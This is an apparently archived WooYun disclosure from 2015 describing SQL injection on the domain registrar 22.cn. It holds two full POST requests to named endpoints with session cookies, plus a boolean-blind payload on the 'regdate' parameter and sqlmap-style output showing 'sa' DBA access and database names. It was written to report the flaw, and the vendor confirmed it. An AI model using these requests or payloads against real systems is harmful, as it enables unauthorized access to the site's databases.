当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123643

漏洞标题:域名商爱名网主站SQL注射sa权限

相关厂商:爱名网

漏洞作者: 路人甲

提交时间:2015-06-30 11:29

修复时间:2015-08-17 22:30

公开时间:2015-08-17 22:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-30: 细节已通知厂商并且等待厂商处理中
2015-07-03: 厂商已经确认,细节仅向厂商公开
2015-07-13: 细节向核心白帽子及相关领域专家公开
2015-07-23: 细节向普通白帽子公开
2015-08-02: 细节向实习白帽子公开
2015-08-17: 细节向公众公开

简要描述:

233

详细说明:

1,
POST /ajax/yuming/guoqi.ashx?t=0.5308634389657527 HTTP/1.1
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: www.22.cn
Cookie: CNZZDATA906087=cnzz_eid%3D1907332321-1435471336-%26ntime%3D1435471336; pic0=images/kefu/dongdong.png; pic1=images/kefu/shuangshuang.png; pic2=images/kefu/wangyan.png; pic3=images/kefu/suxiao.png; ASP.NET_SessionId=bewks2551bomxt2hl1a44y45; aimingsso=930b4b577b6049789399a1a9a647510b; spm=nav_wp,newmember; jingjiatuijian=388758|Labs.com|90552|2##?2###|--@388346|newsfeed.com|25146|1##?2###|--@388768|iLLustrated.com|19152|2##?2###|--@388353|keyo.com|18546|1##?2###|--@388351|personfinder.com|15738|1##?2###|--@388784|greenbacks.com|13146|2##?3###|--@388339|LaLaLand.com|13146|1##?1###|--@388771|shadows.com|13146|2##?2###|--@388283|oomi.com|9972|11##?4###|--@388779|propertyprices.com|9546|2##?3###|--@; weiyueyuming=62|czh.com.cn@61|######.cn@60|##?cn@54|cybank.cn@52|kin.com.cn@; shopcart=
Host: www.22.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fan&action=&deldate=2015-06-22&keyword=e&orderby=&pageCount=50&pageIndex=1&position=4&regdate=2006&rtype=cn&seo=&suffix=.net,.com.cn,.net.cn,all,
2,
POST /ajax/YuDing/liebiao.ashx?t=0.7928370023146272&type=cn HTTP/1.1
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: www.22.cn
Cookie: CNZZDATA906087=cnzz_eid%3D1907332321-1435471336-%26ntime%3D1435471336; pic0=images/kefu/dongdong.png; pic1=images/kefu/shuangshuang.png; pic2=images/kefu/wangyan.png; pic3=images/kefu/suxiao.png; ASP.NET_SessionId=bewks2551bomxt2hl1a44y45; aimingsso=930b4b577b6049789399a1a9a647510b; spm=nav_wp,newmember; jingjiatuijian=388758|Labs.com|90552|2##?2###|--@388346|newsfeed.com|25146|1##?2###|--@388768|iLLustrated.com|19152|2##?2###|--@388353|keyo.com|18546|1##?2###|--@388351|personfinder.com|15738|1##?2###|--@388784|greenbacks.com|13146|2##?3###|--@388339|LaLaLand.com|13146|1##?1###|--@388771|shadows.com|13146|2##?2###|--@388283|oomi.com|9972|11##?4###|--@388779|propertyprices.com|9546|2##?3###|--@; weiyueyuming=62|czh.com.cn@61|######.cn@60|##?cn@54|cybank.cn@52|kin.com.cn@; shopcart=
Host: www.22.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fan&action=&day=1&digit=,1,2,3&doublep=0&orderby=&pageCount=50&pageIndex=1&position=1&show=1&strlen=0,9&suffix=,.cn,.com.cn&type=1

漏洞证明:

---
Parameter: regdate (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fan&action=&deldate=2015-06-22&keyword=e&orderby=&pageCount=50&pageIndex=1&position=4&regdate=2006 AND 2193=2193&rtype=cn&seo=&suffix=.net,.com.cn,.net.cn,all,
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
current user:    'sa'
current user is DBA:    True
available databases [12]:
[*] a*
[*] de***db
[*] e***ian
[*] e***an
[*] e***me
[*] e***ebak
[*] e***ot
[*] e***is
[*] master
[*] model
[*] msdb
[*] tempdb

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-03 22:29

厂商回复:

非常感谢反馈!请继续监督我们!

最新状态:

暂无